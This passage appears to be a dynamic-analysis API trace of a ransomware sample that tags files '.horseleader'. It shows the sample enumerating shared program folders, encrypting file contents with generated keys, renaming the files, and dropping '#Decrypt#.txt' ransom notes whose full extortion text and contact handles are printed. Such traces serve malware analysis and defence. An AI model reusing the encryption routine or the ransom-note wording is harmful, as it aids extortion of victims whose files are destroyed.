(lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0248.845] StrStrW (lpFirst="MSB1XTOR.DLL", lpSrch=".txt") returned 0x0 [0248.845] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=70544) returned 1 [0248.845] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.845] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.874] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x61c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.874] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.888] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.888] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.888] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0248.888] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.889] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.889] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.889] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.889] CloseHandle (hObject=0x158) returned 1 [0248.889] GetProcessHeap () returned 0x780000 [0248.890] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.890] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL.horseleader") returned 84 [0248.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL.horseleader" 
(normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll.horseleader")) returned 1 [0248.891] GetProcessHeap () returned 0x780000 [0248.891] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.891] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44a7300, ftCreationTime.dwHighDateTime=0x1c3af23, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb44a7300, ftLastWriteTime.dwHighDateTime=0x1c3af23, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WTSP61MS.DLL", cAlternateFileName="")) returned 1 [0248.891] lstrcmpiW (lpString1="WTSP61MS.DLL", lpString2="Windows") returned 1 [0248.891] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0248.891] StrStrIW (lpFirst="WTSP61MS.DLL", lpSrch=".horseleader") returned 0x0 [0248.891] lstrcmpW (lpString1="WTSP61MS.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.891] lstrcmpW (lpString1="WTSP61MS.DLL", lpString2="_uninstalling_.png") returned 1 [0248.891] lstrlenW (lpString=".testttjffg") returned 11 [0248.892] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL", lpSrch=".testttjffg") returned 0x0 [0248.892] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.892] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL" (normalized: "c:\\program files\\common 
files\\microsoft shared\\translat\\wtsp61ms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.893] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0248.893] StrStrW (lpFirst="WTSP61MS.DLL", lpSrch=".txt") returned 0x0 [0248.893] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=221184) returned 1 [0248.893] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.893] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.897] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.897] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.898] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x18800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.898] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.917] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.917] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | 
out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.917] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x31000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0249.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.187] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0249.188] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0249.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0249.188] CloseHandle (hObject=0x158) returned 1 [0249.188] GetProcessHeap () returned 0x780000 [0249.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0249.188] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL.horseleader") returned 84 [0249.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\WTSP61MS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll.horseleader")) returned 1 [0249.190] GetProcessHeap () returned 0x780000 [0249.190] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0249.190] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44a7300, ftCreationTime.dwHighDateTime=0x1c3af23, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb44a7300, ftLastWriteTime.dwHighDateTime=0x1c3af23, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WTSP61MS.DLL", cAlternateFileName="")) returned 0 [0249.190] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0249.190] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\#Decrypt#.txt") returned 73 [0249.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0249.190] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will 
prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0249.191] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0249.192] lstrlenA (lpString="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") returned 1368 [0249.192] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0249.192] CloseHandle (hObject=0x21c) returned 1 [0249.192] GetProcessHeap () returned 0x780000 [0249.192] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0249.192] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Triedit", cAlternateFileName="")) returned 1 [0249.192] lstrcmpiW (lpString1="Triedit", lpString2="Windows") returned -1 [0249.192] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned 58 [0249.192] lstrcmpW (lpString1="Triedit", lpString2=".") returned 1 [0249.192] lstrcmpW (lpString1="Triedit", lpString2="..") returned 1 [0249.193] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.193] GetProcessHeap () returned 0x780000 [0249.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dbfd8 [0249.193] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*") returned 60 [0249.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0249.193] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.193] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\.") returned 60 [0249.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.194] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0249.194] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.194] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\..") returned 61 [0249.194] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.194] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0249.194] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0249.194] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0249.194] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned 64 [0249.194] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0249.194] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0249.194] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.194] GetProcessHeap () returned 0x780000 [0249.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0249.195] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*") returned 66 [0249.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName=".", cAlternateFileName="")) returned 0x7c6760 
[0249.196] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.196] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\.") returned 66 [0249.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.196] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="..", cAlternateFileName="")) returned 1 [0249.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.196] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\..") returned 67 [0249.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.196] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="..", cAlternateFileName="")) returned 0 [0249.196] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0249.196] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\#Decrypt#.txt") 
returned 78 [0249.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0249.197] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0249.197] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0249.198] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0249.198] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0249.198] CloseHandle (hObject=0x158) returned 1 [0249.199] 
